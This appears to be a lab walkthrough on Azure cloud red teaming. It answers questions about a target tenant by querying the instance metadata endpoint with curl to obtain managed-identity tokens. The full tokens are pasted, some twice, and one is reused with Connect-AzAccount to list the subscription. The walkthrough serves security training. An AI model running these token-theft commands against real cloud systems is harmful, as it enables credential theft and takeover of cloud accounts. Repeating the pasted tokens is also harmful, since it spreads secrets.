Azure Cloud Red Teaming
1. What is the subdomain of “atomic-nuclear.site” organisation which hosted app on azure vm?
https://urlscan.io/search/#atomic-nuclear.site
Answer
internal.atomic-nuclear.site
Get JWT token
___
Payload: curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com/"
---
Decode JWT token
___
{"access_token":"eyJ0eXAiOiJKV1QiLCJub25jZSI6Ik4tbjNic01aVko3LUJSVV9NS0pmU0N2Y2thZXVoMXNhSDdRbE0xbjNfMFUiLCJhbGciOiJSUzI1NiIsIng1dCI6IkNOdjBPSTNSd3FsSEZFVm5hb01Bc2hDSDJYRSIsImtpZCI6IkNOdjBPSTNSd3FsSEZFVm5hb01Bc2hDSDJYRSJ9.eyJhdWQiOiJodHRwczovL2dyYXBoLm1pY3Jvc29mdC5jb20vIiwiaXNzIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvMTQzMTk4YzQtNzdiZS00MmY3LWIxOGUtOTVjNWI2OTNlNmI5LyIsImlhdCI6MTc0NjUzMzA0NywibmJmIjoxNzQ2NTMzMDQ3LCJleHAiOjE3NDY2MTk3NDcsImFpbyI6ImsyUmdZSGl6L0hnRFovQ0JiaVhyMWMvOVkrY0dBZ0E9IiwiYXBwX2Rpc3BsYXluYW1lIjoiaXQtdm0iLCJhcHBpZCI6IjdkZTkwNjVjLTJkNDItNGJjNy04NDBmLWU2ODY5NmRiNTNjYyIsImFwcGlkYWNyIjoiMiIsImlkcCI6Imh0dHBzOi8vc3RzLndpbmRvd3MubmV0LzE0MzE5OGM0LTc3YmUtNDJmNy1iMThlLTk1YzViNjkzZTZiOS8iLCJpZHR5cCI6ImFwcCIsIm9pZCI6Ijg2Y2EzOTU1LTZjN2UtNDhkNS05ZThkLWI2YjFkMTczYzhjMCIsInJoIjoiMS5BSEFBeEpneEZMNTM5MEt4anBYRnRwUG11UU1BQUFBQUFBQUF3QUFBQUFBQUFBREVBQUJ3QUEuIiwic3ViIjoiODZjYTM5NTUtNmM3ZS00OGQ1LTllOGQtYjZiMWQxNzNjOGMwIiwidGVuYW50X3JlZ2lvbl9zY29wZSI6IkFTIiwidGlkIjoiMTQzMTk4YzQtNzdiZS00MmY3LWIxOGUtOTVjNWI2OTNlNmI5IiwidXRpIjoiMDA0Rk9CVGxnVTJuSmJWRnZIWUtBUSIsInZlciI6IjEuMCIsIndpZHMiOlsiZjJlZjk5MmMtM2FmYi00NmI5LWI3Y2YtYTEyNmVlNzRjNDUxIiwiMDk5N2ExZDAtMGQxZC00YWNiLWI0MDgtZDVjYTczMTIxZTkwIl0sInhtc19pZHJlbCI6IjcgMjgiLCJ4bXNfdGNkdCI6MTYyOTk4MzYwMn0.ehj8deCz7kVsTbHvDxFwwIs6i5BvTZcdt-pUjNfKA9vwTma2NnE-j-dbOpC_Hw9a7bYG5MD3R-8wcRVgNq-bwyW5JewWwYCClI2xcOkaQ_WtHCWBTQlkYSxjqe7qcX1Oc4NHqQxuCwmsF0q6KGHp6lpV98m6DWdAnKvclR8LCKkMyqLt32I5TN3P8xzynsE5_CByNKOv5oTCOH9Bnp6vsjOzZGoDNLAcfBWubFYb6LzrV393qTdSErsRXQcm-VT56wkBQJFdHNte-XjOQoMUwxOE73sJCWiXfZQDYTwJiqp85Ax7JkiTZkjVdvW7YD2VSJAeeUu1Ki8Z4QEZ3BGBjw","client_id":"7de9065c-2d42-4bc7-840f-e68696db53cc","expires_in":"84192","expires_on":"1746619747","ext_expires_in":"86399","not_before":"1746533047","resource":"https://graph.microsoft.com/","token_type":"Bearer"}{"access_token":"eyJ0eXAiOiJKV1QiLCJub25jZSI6Ik4tbjNic01aVko3LUJSVV9NS0pmU0N2Y2thZXVoMXNhSDdRbE0xbjNfMFUiLCJhbGciOiJSUzI1NiIsIng1dCI6IkNOdjBPSTNSd3FsSEZFVm5hb01Bc2hDSDJYRSIsImtpZCI6IkNOdjBPSTNSd3FsSEZFVm5hb01Bc2hDSDJYRSJ9.eyJhdWQiOiJodHRwczovL2dyYXBoLm1pY3Jvc29mdC5jb20vIiwiaXNzIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvMTQzMTk4YzQtNzdiZS00MmY3LWIxOGUtOTVjNWI2OTNlNmI5LyIsImlhdCI6MTc0NjUzMzA0NywibmJmIjoxNzQ2NTMzMDQ3LCJleHAiOjE3NDY2MTk3NDcsImFpbyI6ImsyUmdZSGl6L0hnRFovQ0JiaVhyMWMvOVkrY0dBZ0E9IiwiYXBwX2Rpc3BsYXluYW1lIjoiaXQtdm0iLCJhcHBpZCI6IjdkZTkwNjVjLTJkNDItNGJjNy04NDBmLWU2ODY5NmRiNTNjYyIsImFwcGlkYWNyIjoiMiIsImlkcCI6Imh0dHBzOi8vc3RzLndpbmRvd3MubmV0LzE0MzE5OGM0LTc3YmUtNDJmNy1iMThlLTk1YzViNjkzZTZiOS8iLCJpZHR5cCI6ImFwcCIsIm9pZCI6Ijg2Y2EzOTU1LTZjN2UtNDhkNS05ZThkLWI2YjFkMTczYzhjMCIsInJoIjoiMS5BSEFBeEpneEZMNTM5MEt4anBYRnRwUG11UU1BQUFBQUFBQUF3QUFBQUFBQUFBREVBQUJ3QUEuIiwic3ViIjoiODZjYTM5NTUtNmM3ZS00OGQ1LTllOGQtYjZiMWQxNzNjOGMwIiwidGVuYW50X3JlZ2lvbl9zY29wZSI6IkFTIiwidGlkIjoiMTQzMTk4YzQtNzdiZS00MmY3LWIxOGUtOTVjNWI2OTNlNmI5IiwidXRpIjoiMDA0Rk9CVGxnVTJuSmJWRnZIWUtBUSIsInZlciI6IjEuMCIsIndpZHMiOlsiZjJlZjk5MmMtM2FmYi00NmI5LWI3Y2YtYTEyNmVlNzRjNDUxIiwiMDk5N2ExZDAtMGQxZC00YWNiLWI0MDgtZDVjYTczMTIxZTkwIl0sInhtc19pZHJlbCI6IjcgMjgiLCJ4bXNfdGNkdCI6MTYyOTk4MzYwMn0.ehj8deCz7kVsTbHvDxFwwIs6i5BvTZcdt-pUjNfKA9vwTma2NnE-j-dbOpC_Hw9a7bYG5MD3R-8wcRVgNq-bwyW5JewWwYCClI2xcOkaQ_WtHCWBTQlkYSxjqe7qcX1Oc4NHqQxuCwmsF0q6KGHp6lpV98m6DWdAnKvclR8LCKkMyqLt32I5TN3P8xzynsE5_CByNKOv5oTCOH9Bnp6vsjOzZGoDNLAcfBWubFYb6LzrV393qTdSErsRXQcm-VT56wkBQJFdHNte-XjOQoMUwxOE73sJCWiXfZQDYTwJiqp85Ax7JkiTZkjVdvW7YD2VSJAeeUu1Ki8Z4QEZ3BGBjw","client_id":"7de9065c-2d42-4bc7-840f-e68696db53cc","expires_in":"84192","expires_on":"1746619747","ext_expires_in":"86399","not_before":"1746533047","resource":"https://graph.microsoft.com/","token_type":"Bearer"}!
Answer
https://sts.windows.net/143198c4-77be-42f7-b18e-95c5b693e6b9/
3. What is the tenant id of the organization?
Read again token and read tenant id
---
{"access_token":"eyJ0eXAiOiJKV1QiLCJub25jZSI6InZ0SGVoVWd3N0t2Q3pTV2FMejg1TG1vaTdmamNfa2RCb2FxNEs1X0VWOXciLCJhbGciOiJSUzI1NiIsIng1dCI6IkNOdjBPSTNSd3FsSEZFVm5hb01Bc2hDSDJYRSIsImtpZCI6IkNOdjBPSTNSd3FsSEZFVm5hb01Bc2hDSDJYRSJ9.eyJhdWQiOiJodHRwczovL2dyYXBoLm1pY3Jvc29mdC5jb20vIiwiaXNzIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvMTQzMTk4YzQtNzdiZS00MmY3LWIxOGUtOTVjNWI2OTNlNmI5LyIsImlhdCI6MTc0NjcwOTUxNywibmJmIjoxNzQ2NzA5NTE3LCJleHAiOjE3NDY3OTYyMTcsImFpbyI6ImsyUmdZRmovKzVUQmZkUHVGSE9YRHJ0dDVWeThBQT09IiwiYXBwX2Rpc3BsYXluYW1lIjoiaXQtdm0iLCJhcHBpZCI6IjdkZTkwNjVjLTJkNDItNGJjNy04NDBmLWU2ODY5NmRiNTNjYyIsImFwcGlkYWNyIjoiMiIsImlkcCI6Imh0dHBzOi8vc3RzLndpbmRvd3MubmV0LzE0MzE5OGM0LTc3YmUtNDJmNy1iMThlLTk1YzViNjkzZTZiOS8iLCJpZHR5cCI6ImFwcCIsIm9pZCI6Ijg2Y2EzOTU1LTZjN2UtNDhkNS05ZThkLWI2YjFkMTczYzhjMCIsInJoIjoiMS5BSEFBeEpneEZMNTM5MEt4anBYRnRwUG11UU1BQUFBQUFBQUF3QUFBQUFBQUFBREVBQUJ3QUEuIiwic3ViIjoiODZjYTM5NTUtNmM3ZS00OGQ1LTllOGQtYjZiMWQxNzNjOGMwIiwidGVuYW50X3JlZ2lvbl9zY29wZSI6IkFTIiwidGlkIjoiMTQzMTk4YzQtNzdiZS00MmY3LWIxOGUtOTVjNWI2OTNlNmI5IiwidXRpIjoiQWlRemJtTWFBVWlBNV9Gc1dVX25BUSIsInZlciI6IjEuMCIsIndpZHMiOlsiZjJlZjk5MmMtM2FmYi00NmI5LWI3Y2YtYTEyNmVlNzRjNDUxIiwiMDk5N2ExZDAtMGQxZC00YWNiLWI0MDgtZDVjYTczMTIxZTkwIl0sInhtc19pZHJlbCI6IjEyIDciLCJ4bXNfdGNkdCI6MTYyOTk4MzYwMn0.WHjT0jJr0nr7ofxPIPmfs7iRpIyHegR4kaevfcKUbML_vjXuTCOHpGQ8FdLkg9ahRCRmllyEM8c73727eHv0aVa6K9NWMpg8qlrXGxmVjZa8kQbGFhx1aapxoZNIJS2OkysbEXTo49F7zz7iU--FjRclR24PYNogrUdoBCgH2P559PUVOnb0kpRzMIWpQQhPIBKjUIqnmmIbMk960C-3VfQzX5xRme6C7bmQX0B9rFzsTU77wboxdf-dFmcuq-8wqu5MlpzELDXfWukGi7ilTgKuHt_tBJ6yCxp0Ev4t3-QUlNoEotz7O_O8y4wo_6657L9_NUU9CIzypHrqb91MAg","client_id":"7de9065c-2d42-4bc7-840f-e68696db53cc","expires_in":"85385","expires_on":"1746796217","ext_expires_in":"86399","not_before":"1746709517","resource":"https://graph.microsoft.com/","token_type":"Bearer"}{"access_token":"eyJ0eXAiOiJKV1QiLCJub25jZSI6InZ0SGVoVWd3N0t2Q3pTV2FMejg1TG1vaTdmamNfa2RCb2FxNEs1X0VWOXciLCJhbGciOiJSUzI1NiIsIng1dCI6IkNOdjBPSTNSd3FsSEZFVm5hb01Bc2hDSDJYRSIsImtpZCI6IkNOdjBPSTNSd3FsSEZFVm5hb01Bc2hDSDJYRSJ9.eyJhdWQiOiJodHRwczovL2dyYXBoLm1pY3Jvc29mdC5jb20vIiwiaXNzIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvMTQzMTk4YzQtNzdiZS00MmY3LWIxOGUtOTVjNWI2OTNlNmI5LyIsImlhdCI6MTc0NjcwOTUxNywibmJmIjoxNzQ2NzA5NTE3LCJleHAiOjE3NDY3OTYyMTcsImFpbyI6ImsyUmdZRmovKzVUQmZkUHVGSE9YRHJ0dDVWeThBQT09IiwiYXBwX2Rpc3BsYXluYW1lIjoiaXQtdm0iLCJhcHBpZCI6IjdkZTkwNjVjLTJkNDItNGJjNy04NDBmLWU2ODY5NmRiNTNjYyIsImFwcGlkYWNyIjoiMiIsImlkcCI6Imh0dHBzOi8vc3RzLndpbmRvd3MubmV0LzE0MzE5OGM0LTc3YmUtNDJmNy1iMThlLTk1YzViNjkzZTZiOS8iLCJpZHR5cCI6ImFwcCIsIm9pZCI6Ijg2Y2EzOTU1LTZjN2UtNDhkNS05ZThkLWI2YjFkMTczYzhjMCIsInJoIjoiMS5BSEFBeEpneEZMNTM5MEt4anBYRnRwUG11UU1BQUFBQUFBQUF3QUFBQUFBQUFBREVBQUJ3QUEuIiwic3ViIjoiODZjYTM5NTUtNmM3ZS00OGQ1LTllOGQtYjZiMWQxNzNjOGMwIiwidGVuYW50X3JlZ2lvbl9zY29wZSI6IkFTIiwidGlkIjoiMTQzMTk4YzQtNzdiZS00MmY3LWIxOGUtOTVjNWI2OTNlNmI5IiwidXRpIjoiQWlRemJtTWFBVWlBNV9Gc1dVX25BUSIsInZlciI6IjEuMCIsIndpZHMiOlsiZjJlZjk5MmMtM2FmYi00NmI5LWI3Y2YtYTEyNmVlNzRjNDUxIiwiMDk5N2ExZDAtMGQxZC00YWNiLWI0MDgtZDVjYTczMTIxZTkwIl0sInhtc19pZHJlbCI6IjEyIDciLCJ4bXNfdGNkdCI6MTYyOTk4MzYwMn0.WHjT0jJr0nr7ofxPIPmfs7iRpIyHegR4kaevfcKUbML_vjXuTCOHpGQ8FdLkg9ahRCRmllyEM8c73727eHv0aVa6K9NWMpg8qlrXGxmVjZa8kQbGFhx1aapxoZNIJS2OkysbEXTo49F7zz7iU--FjRclR24PYNogrUdoBCgH2P559PUVOnb0kpRzMIWpQQhPIBKjUIqnmmIbMk960C-3VfQzX5xRme6C7bmQX0B9rFzsTU77wboxdf-dFmcuq-8wqu5MlpzELDXfWukGi7ilTgKuHt_tBJ6yCxp0Ev4t3-QUlNoEotz7O_O8y4wo_6657L9_NUU9CIzypHrqb91MAg","client_id":"7de9065c-2d42-4bc7-840f-e68696db53cc","expires_in":"85385","expires_on":"1746796217","ext_expires_in":"86399","not_before":"1746709517","resource":"https://graph.microsoft.com/","token_type":"Bearer"}!
Answer
143198c4-77be-42f7-b18e-95c5b693e6b9
4. What is the subscription ID/name where the vulnerable app is hosted on VM?
1 Create a new token
Payload: curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
---
2 Run command
┌──(kali㉿kali)-[/home/kali/Desktop/scripts]
└─PS> Connect-AzAccount -AccessToken eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IkNOdjBPSTNSd3FsSEZFVm5hb01Bc2hDSDJYRSIsImtpZCI6IkNOdjBPSTNSd3FsSEZFVm5hb01Bc2hDSDJYRSJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tLyIsImlzcyI6Imh0dHBzOi8vc3RzLndpbmRvd3MubmV0LzE0MzE5OGM0LTc3YmUtNDJmNy1iMThlLTk1YzViNjkzZTZiOS8iLCJpYXQiOjE3NDY3MTA0MjMsIm5iZiI6MTc0NjcxMDQyMywiZXhwIjoxNzQ2Nzk3MTIzLCJhaW8iOiJrMlJnWUxCbTJkQXBIbUxYOEtqbDdRVyt5MTNuQUE9PSIsImFwcGlkIjoiN2RlOTA2NWMtMmQ0Mi00YmM3LTg0MGYtZTY4Njk2ZGI1M2NjIiwiYXBwaWRhY3IiOiIyIiwiZ3JvdXBzIjpbIjg1OWU4ZWRkLTA1OWItNDc2ZC1hYWQ3LWMxZGEzOTZiZWMyMSJdLCJpZHAiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC8xNDMxOThjNC03N2JlLTQyZjctYjE4ZS05NWM1YjY5M2U2YjkvIiwiaWR0eXAiOiJhcHAiLCJvaWQiOiI4NmNhMzk1NS02YzdlLTQ4ZDUtOWU4ZC1iNmIxZDE3M2M4YzAiLCJyaCI6IjEuQUhBQXhKZ3hGTDUzOTBLeGpwWEZ0cFBtdVVaSWYza0F1dGRQdWtQYXdmajJNQlBFQUFCd0FBLiIsInN1YiI6Ijg2Y2EzOTU1LTZjN2UtNDhkNS05ZThkLWI2YjFkMTczYzhjMCIsInRpZCI6IjE0MzE5OGM0LTc3YmUtNDJmNy1iMThlLTk1YzViNjkzZTZiOSIsInV0aSI6Ijg2WG82MUN0VjBleUtSbHVaRml5QVEiLCJ2ZXIiOiIxLjAiLCJ4bXNfaWRyZWwiOiI3IDI0IiwieG1zX21pcmlkIjoiL3N1YnNjcmlwdGlvbnMvYjc4YjRmNGEtZDk5My00OWQzLTlmOTgtYzg3NTJjZTljNzExL3Jlc291cmNlZ3JvdXBzL0lULVJHL3Byb3ZpZGVycy9NaWNyb3NvZnQuQ29tcHV0ZS92aXJ0dWFsTWFjaGluZXMvaXQtdm0iLCJ4bXNfdGNkdCI6MTYyOTk4MzYwMn0.Mj8bIvAunzIQxklTw1tz0rq3kcemnKXUWdlslxCQzCDG7bsw9vAcW9a3RkWVecE_dzdhFlYrFJKu8NiReyfQfEysdF8n5TJApJ6TR1jNCNCyg8AMXVXRkXA0XnLcMyQKuVsN-JaZvx-MPuX_YNfQOiV5Pxg9Y8EZk6dQsiKhFcuTSE9whf4aBbX6ow38xSyHRUaGNPFvTFAgNChsUjUmIdIerwlq0mBvVwc3aTU_138eYyxA86DPRzKZw23LTgL3_74Ksyw8Z1y8UOzE7b_X1idQRQSkCOEdO_cjCT0Ure0t-YqMQEe9UeUxr57WfezTXTdM_c-y1tOkRTNaIfEgdA -AccountId 143198c4-77be-42f7-b18e-95c5b693e6b9
Subscription name Tenant
----------------- ------
Demo-Lab-Testing 143198c4-77be-42f7-b18e-95c5b693e6b9
Answer
Demo-Lab-Testing